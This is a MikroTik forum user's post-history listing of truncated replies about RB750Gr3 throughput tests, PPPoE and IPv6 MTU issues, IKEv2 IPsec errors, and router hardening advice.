Replies: 44
Views: 5573

Re: hEX block diagram

That connection (1000/500) costs here 1/6 of the routers price. How is that relevant in any way to those two diagrams of this router?
by Znevna
Fri Mar 12, 2021 8:14 pm
Forum: RouterBOARD hardware
Topic: S-RJ01 SFP Module in RB4011iGS+ flapping
Replies: 13
Views: 2399

Re: S-RJ01 SFP Module in RB4011iGS+ flapping

That I didn't try, will do when I get back there, thank you!!
by Znevna
Fri Mar 12, 2021 8:07 pm
Forum: RouterBOARD hardware
Topic: hEX block diagram
Replies: 44
Views: 5573

Re: hEX block diagram

Yeah, that's what I thought it works like too, until I did the above tests. The first 4 tests are done with ether1 standalone, other 4 ports in a bridge with hardware offload enabled and active (bridge protocol-mode=none, since STP disables Bridge HW Offload on MT7621).
by Znevna
Fri Mar 12, 2021 7:55 pm
Forum: RouterBOARD hardware
Topic: hEX block diagram
Replies: 44
Views: 5573

Re: hEX block diagram

The PBUS is used for something else, found it described in another PDF: MT7621A - Diagram.PNG I also have an RB4011 in use, even used a S-RJ01 on it until this happened: https://forum.mikrotik.com/viewtopic.php?f=3&t=173219#p847923 But this little 750Gr3 is a little beast too, it's worth knowing...
by Znevna
Fri Mar 12, 2021 7:11 pm
Forum: RouterBOARD hardware
Topic: hEX block diagram
Replies: 44
Views: 5573

Re: hEX block diagram

Exactly. Thank you. Using the SFP port as WAN gives it a full 1Gb/s lane to the CPU while the other 1Gb/s lane is for the remaining 5 ethernet ports. One could buy 1x hEX-S + 1x S-RJ01 just for that if you have only ethernet ports, but at that price you can get the hAP ac2 which has a 2Gb/s lane fro...
by Znevna
Fri Mar 12, 2021 6:06 pm
Forum: RouterBOARD hardware
Topic: hEX block diagram
Replies: 44
Views: 5573

Re: hEX block diagram

I didn't say anything about half duplex links, there are two 1Gb/s full duplex links, one link for ports 1,3,5, and one link for ports 2,4. @sebastia is the one claiming half duplex links, not me. The datasheet doesn't say how MikroTik configured those links, but the MikroTik posted diagrams say how...
by Znevna
Fri Mar 12, 2021 2:36 pm
Forum: RouterBOARD hardware
Topic: hEX block diagram
Replies: 44
Views: 5573

Re: hEX block diagram

That doesn't contradict my findings, using just two ports, based on the first screenshots: screenshot1: ~842Mbps IN ether1 -> ~850Mbps OUT ether2 AND ~817Mbps IN ether2 -> ~815Mbps OUT ether1 -> 2x 1Gb/s links, right? (correct based on the Disabled Switching Diagram, because ports 1 and 2 are on dif...
by Znevna
Fri Mar 12, 2021 1:29 pm
Forum: RouterBOARD hardware
Topic: hEX block diagram
Replies: 44
Views: 5573

Re: hEX block diagram

I you want some assistance or information you should be a bit more polite. Most of us on this forum are not here because we are paid for it. And how would you explain it then, considering that this test goes right against the results of your tests number 2 & 4 from you first post here??? both w...
by Znevna
Fri Mar 12, 2021 12:56 pm
Forum: RouterBOARD hardware
Topic: hEX block diagram
Replies: 44
Views: 5573

Re: hEX block diagram

Ok then, for Pete's sake, explain the screenshot above if you please, with the PPPoE client.
Take ether1, 529+908= ?? :) explain.
by Znevna
Fri Mar 12, 2021 12:48 pm
Forum: RouterBOARD hardware
Topic: hEX block diagram
Replies: 44
Views: 5573

Re: hEX block diagram

facepalm.
All the tests are done with a routing setup, not switching. See the screenshot above. CPU usage ain't for graphics.
by Znevna
Fri Mar 12, 2021 12:33 pm
Forum: RouterBOARD hardware
Topic: hEX block diagram
Replies: 44
Views: 5573

Re: hEX block diagram

you are using it (1Gb/s) already! see second test: https://forum.mikrotik.com/download/file.php?id=45859 Tx + Rx ~1Gb/s for ports ether1 & ether4 the 1Gb/s from diagram is TOTAL bandwidth available, for BOTH sending and receiving I expect an apology now ;-) By your logic, in two of my tests (1 ...
by Znevna
Fri Mar 12, 2021 10:43 am
Forum: RouterBOARD hardware
Topic: hEX block diagram
Replies: 44
Views: 5573

Re: hEX block diagram

Yes, but we also have the Enabled Switching diagram, which looks like this:
https://i.mt.lv/cdn/product_files/RB750 ... 190642.png
hEX RB750Gr3 - Enabled Switching.PNG
How can we use that? I wrote to support about it, we'll see if we can do anything about it.
by Znevna
Fri Mar 12, 2021 9:49 am
Forum: RouterBOARD hardware
Topic: S-RJ01 SFP Module in RB4011iGS+ flapping
Replies: 13
Views: 2399

Re: S-RJ01 SFP Module in RB4011iGS+ flapping

I've used without any port flapping problems something like this, but my RB4011 still runs on 6.46.7 Had to ditch the S-RJ01 SFP module when I had to use MTU>1500 over it for RFC 4638 (PPPoE MTU 1500). I couldn't get it to work properly, the PPPoE session MRU was working properly with 1500 but MTU w...
by Znevna
Fri Mar 12, 2021 9:03 am
Forum: RouterBOARD hardware
Topic: hEX block diagram
Replies: 44
Views: 5573

Re: hEX block diagram

Sorry to bump such an old thread but after an ISP upgrade and currently using a RB750Gr3 here, I wanted to give the things mentioned above a shot, and well, not true. With ethernet1 out of any bridges, and with only one single bridge present with ports 2,3,4 & 5 added to it, all hardware offload...
by Znevna
Thu Mar 11, 2021 8:13 am
Forum: General
Topic: Netflix not loading
Replies: 15
Views: 1565

Re: Netflix not loading

If those websites/games are IPv6 aware, your LAN IPv6 MTU is dictated (as stated in the topic mentioned above) by IPv6/ND, which by default is 1500, messing with your WAN is useless at this point. As (again) stated in the above topic or the one mentioned in there, you either set the proper MTU in IP...
by Znevna
Wed Mar 10, 2021 11:14 pm
Forum: General
Topic: Netflix not loading
Replies: 15
Views: 1565

Re: Netflix not loading

search the forum a little, doesn't hurt:
viewtopic.php?f=2&t=171390
by Znevna
Sun Feb 21, 2021 11:45 pm
Forum: General
Topic: Winbox - Darkmode - For the love of God, Please. [SOLVED]
Replies: 14
Views: 2145

Re: Winbox - Darkmode - For the love of God, Please. [SOLVED]

Ah yes, the only problem left to be resolved in the MikroTik world: a dark mode for WinBox.
As a side note, I have all my monitors set at around 120cd/m2, which is a reasonable value for most home/office environments, no "screaming white light" here.
by Znevna
Mon Feb 15, 2021 9:29 pm
Forum: General
Topic: DHCP Client
Replies: 15
Views: 5175

Re: DHCP Client

@Mozez any reason why you try to look smart on a ~3 years old topic?
by Znevna
Mon Feb 15, 2021 1:41 pm
Forum: Announcements
Topic: v6.47.9 [long-term] is released!
Replies: 77
Views: 24522

Re: v6.47.9 [long-term] is released!

The PoE issue was introduced in 6.46.8, as the comments from that release prove it.
Going back to 6.46.7 fixes it. Someone complained in IRC too about that.
One of the reasons I was hoping for a 6.46.9 bugfix release.
by Znevna
Thu Feb 11, 2021 11:44 am
Forum: General
Topic: Polling of mikrotik.com [SOLVED]
Replies: 7
Views: 693

Re: Polling of mikrotik.com [SOLVED]

IP > Cloud > Update Time also uses the cloud afaik.
by Znevna
Wed Feb 10, 2021 11:16 am
Forum: Announcements
Topic: v6.47.9 [long-term] is released!
Replies: 77
Views: 24522

Re: v6.47.9 [long-term] is released!

I was hoping for at least an 6.46.9 version if not more, with more fixes than with added features.. Oh well.
by Znevna
Mon Feb 01, 2021 2:35 pm
Forum: General
Topic: Mikrotik and pfsense
Replies: 1
Views: 307

Re: Mikrotik and pfsense

I'd say that not all configurations are done properly, or it would've worked.
But we'll check our crystal balls regarding that.
by Znevna
Mon Feb 01, 2021 9:07 am
Forum: General
Topic: Open 100 tabs at the same time
Replies: 13
Views: 1055

Re: Open 100 tabs at the same time

Best solution: get a router that can handle your traffic.
hAP ac lite has a not so powerful CPU.
Any reason why you're using two bridges anyway?
Stick to one bridge.
And stop creating topics all over the place for the same issue.
by Znevna
Fri Jan 29, 2021 5:53 pm
Forum: General
Topic: IPv6 over vlan issues
Replies: 11
Views: 892

Re: IPv6 over vlan issues

Did you change your VLAN config again? now a bridge appeared! Why?
Add those VLANs to Ethernet1 directly.
by Znevna
Fri Jan 29, 2021 2:54 pm
Forum: General
Topic: IPv6 over vlan issues
Replies: 11
Views: 892

Re: IPv6 over vlan issues

That's not how it works, and that ::10a is outside that specified /126, again. But since you seem to know better, fix it yourself. You're still missing a proper default route/gateway. And if your ISP routed that /48 through that ::8 they gave you, you have to use that ::8, not whatever you want. Che...
by Znevna
Fri Jan 29, 2021 12:46 pm
Forum: General
Topic: IPv6 over vlan issues
Replies: 11
Views: 892

Re: IPv6 over vlan issues

I donno about the VLAN config but your whole IPv6 config just looks wrong. Shouldn't you have 2001:DB8:ffff:fffe::8/126 set on your IPv6 VLAN Interface? What is that ::2 doing there? which is outside the said /126. I see no purpose for that P2P pool. And where is your gateway? You've mentioned 2001:...
by Znevna
Thu Jan 28, 2021 7:34 pm
Forum: General
Topic: Mikrotik PCI DSS External Vulnerability Scan
Replies: 5
Views: 562

Re: Mikrotik PCI DSS External Vulnerability Scan

I'm eager to see that export.
by Znevna
Thu Jan 28, 2021 8:42 am
Forum: General
Topic: What is strtbiz.site?
Replies: 6
Views: 836

Re: What is strtbiz.site?

Must lilkely you've set "allow remote requests" in the DNS Settings and you didn't block access to it from the internet, and now your Router is part of a DNS Attack.
Secure your router.
by Znevna
Mon Jan 25, 2021 12:28 am
Forum: General
Topic: Buy/Subscirbe VPN GAME Amazon Web Services (AWS)
Replies: 6
Views: 551

Re: Buy/Subscirbe VPN GAME Amazon Web Services (AWS)

adding more latency to your latency issues never solved anything.
by Znevna
Mon Jan 25, 2021 12:06 am
Forum: General
Topic: Buy/Subscirbe VPN GAME Amazon Web Services (AWS)
Replies: 6
Views: 551

Re: Buy/Subscirbe VPN GAME Amazon Web Services (AWS)

Yes, change your ISP.
by Znevna
Sat Jan 23, 2021 11:44 am
Forum: General
Topic: Coax to RJ45 - is a MoCA adapter required? [SOLVED]
Replies: 8
Views: 952

Re: Coax to RJ45 - is a MoCA adapter required? [SOLVED]

That has nothing to do with MoCA, it's part of a system used by Dahua, ePoE, and those adapters are advertised as EoC Passive Converters, the "passive" implies no chipset.
https://www.dahuasecurity.com/products/ ... logies/332
by Znevna
Fri Jan 22, 2021 5:19 am
Forum: General
Topic: Coax to RJ45 - is a MoCA adapter required? [SOLVED]
Replies: 8
Views: 952

Re: Coax to RJ45 - is a MoCA adapter required? [SOLVED]

Just like stated above, there are no alternatives to your cable modem. Those MoCA (Multimedia over Coax Alliance) devices work in pairs, so unless your ISP is using them for the services provided to you they would do you no good. Unless you want to use a pair of them in your house for something else...
by Znevna
Sun Jan 17, 2021 2:52 pm
Forum: General
Topic: Mikrotik 6.48 TCP timestamps Vulnerability [SOLVED]
Replies: 13
Views: 1664

Re: Mikrotik 6.48 TCP timestamps Vulnerability [SOLVED]

Same advice I gave him above to fix his "tcp timestamps". If he would've done that, both of these "vulnerabilities" wouldn't be an "issue" -- secure your devices or pay someone to do it for you.
But the nut didn't stick to the wall.
by Znevna
Sun Jan 17, 2021 12:40 pm
Forum: General
Topic: Mikrotik 6.48 TCP timestamps Vulnerability [SOLVED]
Replies: 13
Views: 1664

Re: Mikrotik 6.48 TCP timestamps Vulnerability [SOLVED]

yes, fix it like you've fixed the one above.
by Znevna
Mon Jan 11, 2021 3:06 pm
Forum: General
Topic: Netflix and IPv6
Replies: 27
Views: 3298

Re: Netflix and IPv6

It's the last time I wrote about some quirks in the configs. An "Oh yeah we forgot about this since we set it like this ages ago, we'll maybe take a look on this to improve the behaviour since it might have not been the best call back then" would've been a little better than "set it y...
by Znevna
Mon Jan 11, 2021 2:06 pm
Forum: General
Topic: Netflix and IPv6
Replies: 27
Views: 3298

Re: Netflix and IPv6

Ok, support response is: "RouterOS simply allocates 20 bytes headers. You can manually set the MTU and MRU values for the interface if other values are suitable. There is no need to increase the MTU on the ethernet interface." So they won't do anything about it. "What about the users ...
by Znevna
Mon Jan 11, 2021 10:10 am
Forum: General
Topic: RB750Gr3 difference between workstation speedtest vs bandwitch test
Replies: 13
Views: 968

Re: RB750Gr3 difference between workstation speedtest vs bandwitch test

It's not a hardware problem, that's for sure. He stated above that he had the same issue with 750Gr2 which is a completly different SoC (QCA9556 vs MT7621A) but even 750Gr2 can handle more than 100Mbps. It's somewhere between the chair and the speedtest server, but closer to the chair since I had a ...
by Znevna
Mon Jan 11, 2021 5:08 am
Forum: General
Topic: PUBG on Mikrotik | IP servers PUBG | Forward
Replies: 2
Views: 1654

Re: PUBG on Mikrotik | IP servers PUBG | Forward

Get your snakeoil here, snakeoil everyone!
In what world limiting = acceleration?
Useless address lists.
by Znevna
Sat Jan 09, 2021 11:25 am
Forum: General
Topic: Netflix and IPv6
Replies: 27
Views: 3298

Re: Netflix and IPv6

I'll wait from support, the behaviour ain't quite right.
Any user that has a pppoe-client as WAN out there is using a 12 bytes lower MTU than his provider supports, if everything is left to auto/defaults that is.
by Znevna
Fri Jan 08, 2021 6:25 pm
Forum: General
Topic: Netflix and IPv6
Replies: 27
Views: 3298

Re: Netflix and IPv6

Ok, I think I've figured it out where the bug might be, hope support confirms / fixes this. I've took some captures from the ethernet interface while connecting the pppoe-client and while watching them in Wireshark I saw something in an area to which I didn't pay much attention earlier (protocol req...
by Znevna
Fri Jan 08, 2021 3:09 pm
Forum: General
Topic: Mikrotik or NOT!!! Industry standarts say no!! Why? [SOLVED]
Replies: 114
Views: 11475

Re: Mikrotik or NOT!!! Industry standarts say no!! Why? [SOLVED]

I'm sure that every admin out there that respects his job went ahead and quickly updated all his production routers and switches just before new year not even a day after the build was released. That admin that did such a thing is not "industry standart (whatever a standart is)". Also the ...
by Znevna
Thu Jan 07, 2021 3:26 pm
Forum: General
Topic: Netflix and IPv6
Replies: 27
Views: 3298

Re: Netflix and IPv6

I wrote to support about this anyway, I had good results with support in the past, the issues reported were fixed.
by Znevna
Thu Jan 07, 2021 2:52 pm
Forum: General
Topic: Netflix and IPv6
Replies: 27
Views: 3298

Re: Netflix and IPv6

Regarding the MRU, no, here it shows only 1492 (max-mtu/mru both unset / auto) but I'll stay with 1520 in case the ISP decides to implement RFC4638 anyway.
ppp-mtu.PNG
by Znevna
Thu Jan 07, 2021 2:42 pm
Forum: General
Topic: Netflix and IPv6
Replies: 27
Views: 3298

Re: Netflix and IPv6

That's the one I was reffering to, how and why are those 12 (apparently invisible since it works just fine with 1500 and manualy setting 1492 for the PPPoE client interface) bytes getting in the picture.
I wasn't referring to the max-payload packet, I was just underlining the differences there.
by Znevna
Thu Jan 07, 2021 2:14 pm
Forum: General
Topic: Netflix and IPv6
Replies: 27
Views: 3298

Re: Netflix and IPv6

Ah, you had another post above explaining the two ISP's, I've missed it, sorry. Did some tests here, is this realy a MikroTik PPPoE implementation bug? I'll post some logs with stripped irelevant (I hope) stuff. Ethernet MTU 1500: 13:20:05 pppoe,ppp,debug,packet pppoe-wan: sent LCP ConfReq id=0x20 1...
by Znevna
Thu Jan 07, 2021 12:33 pm
Forum: General
Topic: Netflix and IPv6
Replies: 27
Views: 3298

Re: Netflix and IPv6

Your magic orb is probably better than mine, maybe he set it to the MTU negotiated by the PPPoE interface, like I wrote on the other topic :) PS: your screenshots kinda proove that your ISP has RFC4638 implemented, otherwise it wouldn't negotiate 1500 MTU on your PPPoE interface. Why do you state th...
by Znevna
Thu Jan 07, 2021 11:59 am
Forum: General
Topic: Some websites unavailable on IPv6 [SOLVED]
Replies: 12
Views: 1554

Re: Some websites unavailable on IPv6 [SOLVED]

Again, not even here he didn't went with 1280. Read: viewtopic.php?f=2&t=169757#p831468
The marked "solution" which stinks was not applied.
by Znevna
Thu Jan 07, 2021 11:51 am
Forum: General
Topic: Netflix and IPv6
Replies: 27
Views: 3298

Re: Netflix and IPv6

How do you know that he forced 1280?
by Znevna
Thu Jan 07, 2021 10:01 am
Forum: General
Topic: RouterOS 5.21 is having problem on speedtest site
Replies: 18
Views: 5065

Re: RouterOS 5.21 is having problem on speedtest site

I think that in the last 7 years @sdugoten fixed his issue.
Good find tho'! right on time.
Are bots getting smarter?
by Znevna
Wed Jan 06, 2021 10:30 pm
Forum: General
Topic: Netflix and IPv6
Replies: 27
Views: 3298

Re: Netflix and IPv6

What is you PPPoE interface Actual MTU?
Anyway, take a look on this topic too: viewtopic.php?f=2&t=169757&p=832247#p831447
by Znevna
Wed Jan 06, 2021 10:56 am
Forum: General
Topic: Mikrotik 6.48 TCP timestamps Vulnerability [SOLVED]
Replies: 13
Views: 1664

Re: Mikrotik 6.48 TCP timestamps Vulnerability [SOLVED]

MikroTik can respond with timestamps only for the services running on it (winbox, www etc) services which should be accessible only from trusted zones (Management VLAN, allowed IP list etc.). So fix your security issues first and there won't be any "vulnerability". For the DSTNATed ports y...
by Znevna
Wed Jan 06, 2021 8:16 am
Forum: General
Topic: Mikrotik 6.48 TCP timestamps Vulnerability [SOLVED]
Replies: 13
Views: 1664

Re: Mikrotik 6.48 TCP timestamps Vulnerability [SOLVED]

What services is your MikroTik Router providing to the outside (wild wild internet) that you consider this a vulnerability?
by Znevna
Tue Jan 05, 2021 12:12 pm
Forum: General
Topic: IP Cloud
Replies: 75
Views: 35240

Re: IP Cloud

You can't.
by Znevna
Mon Jan 04, 2021 2:04 pm
Forum: General
Topic: UPS connection usb for RB750Gr3
Replies: 2
Views: 380

Re: UPS connection usb for RB750Gr3

What kind of UPS are you connecting to it? Is it compatible with the protocol supported by MikroTik / RouterOS ? https://wiki.mikrotik.com/wiki/Manual:System/UPS
by Znevna
Mon Dec 14, 2020 10:38 pm
Forum: General
Topic: How to Exclude a site from Web proxy ?
Replies: 8
Views: 2814

Re: How to Exclude a site from Web proxy ?

Giving solutions to an 8 year old topic, now that's something.
In those 8 years HTTPS got everywhere so this is kinda completly useless anyway.
But congrats for finding this old topic!
by Znevna
Thu Dec 10, 2020 4:22 pm
Forum: General
Topic: "antenna gain" missing in 6.46.8?
Replies: 69
Views: 8233

Re: "antenna gain" missing in 6.46.8?

We know what it means and what it does, adjusting TX Power by that amount to comply to the regulatory-domain limits for the country set. Its long definition in the case above would be: "antenna-gain=substract this amount from the maximum EIRP of the country set and use the result for TX Power.&...
by Znevna
Mon Dec 07, 2020 8:46 pm
Forum: RouterOS v7 BETA
Topic: v7.1beta3 [development] is released!
Replies: 262
Views: 50246

Re: v7.1beta3 [development] is released!

[...] Also, can Mikrotik support please post a setup example for dual band AP config with the wave2 package? On RB4011 I can create one radio interface with the 4x4 5Ghz radio, but are unable (or have not found yet) how to create/enable the 2.4G radio card...? PS: Would be good to create maybe new ...
by Znevna
Fri Dec 04, 2020 3:16 pm
Forum: General
Topic: "antenna gain" missing in 6.46.8?
Replies: 69
Views: 8233

Re: "antenna gain" missing in 6.46.8?

Changing tx-power-mode to all-rates-fixed and altering tx-power does nothing unless we also set frequency-mode to manual-txpower which isn't allowed for the country selected that I'm currently in. Atleast that's what I get on a hAP ac2. And changing the country to something else you wouldn't be boun...
by Znevna
Fri Dec 04, 2020 12:26 pm
Forum: General
Topic: "antenna gain" missing in 6.46.8?
Replies: 69
Views: 8233

Re: "antenna gain" missing in 6.46.8?

Isn't it also the only way to reduce TX Power? By specifying a higher antenna gain? Yes, there are situations where you might want to lower TX Power.
by Znevna
Thu Dec 03, 2020 1:46 pm
Forum: RouterOS v7 BETA
Topic: v7.1beta3 [development] is released!
Replies: 262
Views: 50246

Re: v7.1beta3 [development] is released!

Almost every device out there based on ipq4018/4019 has atleast 256MB of RAM. With a few exceptions, like RT-AC58U which struggles to not throw errors because of the very limited memory available out of the 128MB total. So I wouldn't keep my hopes up to see it running in the future on lower requirem...
by Znevna
Wed Dec 02, 2020 9:07 pm
Forum: General
Topic: DDOS ATTACK
Replies: 14
Views: 1391

Re: DDOS ATTACK

Well, help them, don't send them to some useless blacklist "full of bad guys", for $90 (ps: you add 9 more and you can buy 1x hAP ac³).
A blacklist doesn't fix anything.
Cheers.
by Znevna
Wed Dec 02, 2020 7:08 pm
Forum: General
Topic: DDOS ATTACK
Replies: 14
Views: 1391

Re: DDOS ATTACK

@anav, could you stop recommending that useless blacklist everywhere?
If atleast he had some MikroTik certification.. but self-proclaimed "experts" are meh, in my personal opinion.
Cheers.
by Znevna
Wed Dec 02, 2020 2:44 pm
Forum: General
Topic: Some websites unavailable on IPv6 [SOLVED]
Replies: 12
Views: 1554

Re: Some websites unavailable on IPv6 [SOLVED]

Any advantage / disadvantage messing with mss instead of using lower mtu for IPv6 on LAN in cases like this? PS: contrary to what IPANetEngineer said above, it worked for some websites because some websites still force a lower, fixed MTU for IPv6, like 1280, disregarding the mss from the syn sent by...
by Znevna
Mon Nov 30, 2020 11:55 pm
Forum: General
Topic: Port scanner filling up connection tracking
Replies: 21
Views: 1432

Re: Port scanner filling up connection tracking

Um, you didn't move the port scanning detection rules in raw too, did you? that won't work.
You only keep the drop rule in raw, that's it.
by Znevna
Mon Nov 30, 2020 8:43 pm
Forum: General
Topic: Port scanner filling up connection tracking
Replies: 21
Views: 1432

Re: Port scanner filling up connection tracking

If your raw drop rule is set for a specific list, that list shouldn't contain "legit" IPs -> shouldn't drop legit traffic. If it does, you're doing something wrong. For example I'm piling up IPs that are hammering my DNS with abusive queries (todays favourite query is for "lavrov.in&q...
by Znevna
Mon Nov 30, 2020 12:10 pm
Forum: General
Topic: How is your public IP address determined?
Replies: 23
Views: 1792

Re: How is your public IP address determined?

Where does the public IP fit in while talking about OpenDNS blocking?
LE: I'm pretty sure that your "client" mentioned "public" network but he was referring to a "guest" network.
by Znevna
Sun Nov 29, 2020 4:29 pm
Forum: General
Topic: Some websites unavailable on IPv6 [SOLVED]
Replies: 12
Views: 1554

Re: Some websites unavailable on IPv6 [SOLVED]

Looks like broken PMTUD for whichever of the many reasons that can cause that. I see that you have MTU 1480 on you WAN interface, try setting MTU 1480 in IPv6/ND too, so that your clients get that instead of 1500. Maybe not the best way to deal with this but it is one way. I have it set to 1492 beca...
by Znevna
Mon Nov 23, 2020 4:12 pm
Forum: General
Topic: Question about TCP Established and Call of Duty disconnects [SOLVED]
Replies: 26
Views: 1996

Re: Question about TCP Established and Call of Duty disconnects [SOLVED]

Well he stated in the first post that he was having problems after he lowered TCP Established to 5 minutes (!) from the MikroTik default of 1 day. Tried to raise it to 30 minutes and then to 1 hour, and the last one seemed to work fine with no complaints from the customers. The posts are pretty clea...
by Znevna
Sat Nov 21, 2020 11:48 am
Forum: General
Topic: new Winbox Log window truncation of messages (need change)
Replies: 7
Views: 516

Re: new Winbox Log window truncation of messages (need change)

I like how there's something obviously wrong and people still defend it, saying that it's actually ok, and suggesting more or less complicated and not always practical workarounds. ;) [...] And if you have small screen or bad eyes, then what? Tough luck, no simple log viewing for you? Don't forget,...
by Znevna
Fri Nov 20, 2020 11:57 pm
Forum: General
Topic: new Winbox Log window truncation of messages (need change)
Replies: 7
Views: 516

Re: new Winbox Log window truncation of messages (need change)

That screenshot is 1281px wide, adding the missing menu from winbox probably results to 1366. That again, ain't 1080p, because if it was it should've been close to 1920 not to 1366. Disable the Display Scaling. And you can always export the log and view it with your favourite text editor, wrapped or...
by Znevna
Sat Nov 14, 2020 2:41 pm
Forum: General
Topic: Feature request: NTP client: canonical name of NTP servers
Replies: 7
Views: 599

Re: Feature request: NTP client: canonical name of NTP servers

He didn't mention if he needs the NTP package, I stand by my reply until then :P
by Znevna
Sat Nov 14, 2020 11:47 am
Forum: General
Topic: Feature request: NTP client: canonical name of NTP servers
Replies: 7
Views: 599

Re: Feature request: NTP client: canonical name of NTP servers

What feature? Some arrow to point you to the right menu?
snipntp1.PNG
by Znevna
Wed Nov 11, 2020 11:53 pm
Forum: General
Topic: IPv6 - Advertise router as DNS [SOLVED]
Replies: 15
Views: 16316

Re: IPv6 - Advertise router as DNS [SOLVED]

The wiki page for the DHCPv6 server is missing the options part even if there's a link to it in there (deserves a fix): https://wiki.mikrotik.com/wiki/Manual:IPv6/DHCP_Server#Options But, in 6.42 came this: *) dhcpv6-server - added DHCPv4 style user options; And https://wiki.mikrotik.com/wiki/Manual...
by Znevna
Wed Nov 11, 2020 1:52 pm
Forum: General
Topic: Horrifying bug in the DNS?
Replies: 3
Views: 388

Re: Horrifying bug in the DNS?

So the poster isn't on any recent release of any branch.
Horrifying indeed.
Checked in 6.46.7, works fine. As @Sob mentioned.
by Znevna
Tue Nov 10, 2020 11:47 pm
Forum: General
Topic: IP Cloud
Replies: 75
Views: 35240

Re: IP Cloud

Easier and safer to add cloud2.mikrotik.com to IPv6/Firewall/Address Lists.
And block that list in the IPv6 firewall.
by Znevna
Tue Nov 10, 2020 11:03 pm
Forum: General
Topic: IPv6 - Advertise router as DNS [SOLVED]
Replies: 15
Views: 16316

Re: IPv6 - Advertise router as DNS [SOLVED]

Oh, I wasn't referring to the solution provided by you, but to the python script posted above.
Sorry :D
by Znevna
Tue Nov 10, 2020 10:36 pm
Forum: General
Topic: IPv6 - Advertise router as DNS [SOLVED]
Replies: 15
Views: 16316

Re: IPv6 - Advertise router as DNS [SOLVED]

why complicate your life? /ipv6 dhcp-server option> add code=23 name=dnstest value="'fe80::ceff:e0ff:fabc:abcd'" /ipv6 dhcp-server option> print # NAME CODE VALUE RAW-VALUE [...] 4 dnstest 23 'fe80::ceff:e0ff:fabc:abcd' fe80000000000000ceffe0fffabcabcd
by Znevna
Wed Nov 04, 2020 12:57 pm
Forum: General
Topic: Does quouting quotes of quotes in consecutive post make any sense?
Replies: 45
Views: 5178

Re: Does quouting quotes of quotes in consecutive post make any sense?

So you had the power to strip the quote from the post that irritated you and warn the user about this bad practice a little more subtle, but instead you decided to post your offtopic rant, as a moderator...
by Znevna
Tue Nov 03, 2020 9:42 pm
Forum: General
Topic: Does quouting quotes of quotes in consecutive post make any sense?
Replies: 45
Views: 5178

Re: v6.46.8 [long-term] is released!

OT but ... maybe I am too irritable but I CAN'T UNDERSTAND why quoting whole PRECEDING post is assumed to be a better answer than just sending a short comment? Why pushing "Post reply" is avoided by readers but "Reply with quote" is not? Do they think that others are unable to f...
by Znevna
Thu Oct 22, 2020 9:32 am
Forum: General
Topic: IKEv2 IOS - Cannot Connect [SOLVED]
Replies: 21
Views: 4977

Re: IKEv2 IOS - Cannot Connect [SOLVED]

I've connected two months ago using whatever latest iOS was back then, with CA cert valid for 10 years and client cert also valid for 10 years, I didn't see that ~800 days limitation that is mentioned around here.
by Znevna
Fri Oct 09, 2020 3:48 pm
Forum: General
Topic: IKEv2: ipsec SPI [...] not registered for [...]
Replies: 8
Views: 784

Re: IKEv2: ipsec SPI [...] not registered for [...]

The logs above are hard to follow as I didn't realize until after posting them that I had one working machine behind that IP and one not working. So parts with the same client.addr are ok and others not. LE: the one with port 1024 was working and the one with 4500 was not. The other machine behind t...
by Znevna
Fri Oct 09, 2020 3:11 pm
Forum: General
Topic: IKEv2: ipsec SPI [...] not registered for [...]
Replies: 8
Views: 784

Re: IKEv2: ipsec SPI [...] not registered for [...]

So, I've had a closer look even in the logs above, notice this: 13:00:46 ipsec -> ike2 request, exchange: INFORMATIONAL:2 CLIENT.IP.ADDR[4500] b11fd45efa9bc4fa:cf4eae90ff15f549 13:00:46 ipsec SPI 49f515ff90ae4ecf not registered for CLIENT.IP.ADDR[4500] In the first line: cf 4e ae 90 ff 15 f5 49 And ...
by Znevna
Fri Oct 09, 2020 1:49 pm
Forum: General
Topic: IKEv2: ipsec SPI [...] not registered for [...]
Replies: 8
Views: 784

Re: IKEv2: ipsec SPI [...] not registered for [...]

Well, I can't reproduce this. Yesterday I had 3 clients with this problem, today all 3 work fine. Nothing usefull I can send to support. I can't see any other lines like that in the logs either. How is that SPI hash computed? what could've caused ipsec to look for the wrong one for some clients? dat...
by Znevna
Thu Oct 08, 2020 10:45 pm
Forum: General
Topic: IKEv2: ipsec SPI [...] not registered for [...]
Replies: 8
Views: 784

Re: IKEv2: ipsec SPI [...] not registered for [...]

I've rebooted, updated from 6.46.6 to 6.46.7, disabled/enabled the peer on the server, redone the affected client's identities and mode-confs, nothing helped so far. Now I'm just waiting for calls to switch the nonfunctional ones to an alternate connection to the server until I sort this out. I was ...
by Znevna
Thu Oct 08, 2020 10:08 pm
Forum: General
Topic: IKEv2: ipsec SPI [...] not registered for [...]
Replies: 8
Views: 784

Re: IKEv2: ipsec SPI [...] not registered for [...]

During the day one more client failed to have a functional VPN. Only Windows clients affected so far, since I mostly have Windows clients with a few exceptions it might be just a matter of time. What can cause these? software? hardware going bad? I can see the SAs getting installed after the clients...
by Znevna
Thu Oct 08, 2020 1:33 pm
Forum: General
Topic: IKEv2: ipsec SPI [...] not registered for [...]
Replies: 8
Views: 784

IKEv2: ipsec SPI [...] not registered for [...]

So.. everything worked fine for a few months on this RB4011, until today, when random clients decided to not work anymore, they connect to the server but can't pass traffic. What I can see relevant in the logs is in the topic title, but why is this happening, no ideea. Running 6.46.6. Help. LE: upgr...
by Znevna
Mon Oct 05, 2020 6:03 pm
Forum: General
Topic: Debugging a Site with IP Cloud (site LONG) [SOLVED]
Replies: 6
Views: 731

Re: Debugging a Site with IP Cloud (site LONG) [SOLVED]

Don't forget to mention it in all your other topics too ^^.
Worked and still works fine here.
I don't rely only on one ddns service where it is needed anyway, so meh.
Thanks for the update tho'.
Cheers.
by Znevna
Thu Oct 01, 2020 5:29 pm
Forum: General
Topic: Debugging a Site with IP Cloud (site LONG) [SOLVED]
Replies: 6
Views: 731

Re: Debugging a Site with IP Cloud (site LONG) [SOLVED]

Since you didn't understand the suggestion by @sindy with the static DNS entry to some other public IP to which you have access instead of the MikroTik ones, you can replace almost all of the above "yes, I did" with "No, I did not" and any further "debugging" seems poin...
by Znevna
Thu Oct 01, 2020 4:43 pm
Forum: General
Topic: Debugging a Site with IP Cloud (site LONG) [SOLVED]
Replies: 6
Views: 731

Re: Debugging a Site with IP Cloud (site LONG) [SOLVED]

yay, another useless topic for the same issue. @sindy suggested something in the OTHER thread, did you do it? On your devices that don't work, point cloud.mikrotik.com and cloud2.mikrotik.com to another public IP where you can monitor incoming packets and see if you receive any UDP packet on port 15...
by Znevna
Thu Oct 01, 2020 9:01 am
Forum: General
Topic: Is there a problem with IP Cloud? [SOLVED]
Replies: 38
Views: 4097

Re: Is there a problem with IP Cloud? [SOLVED]

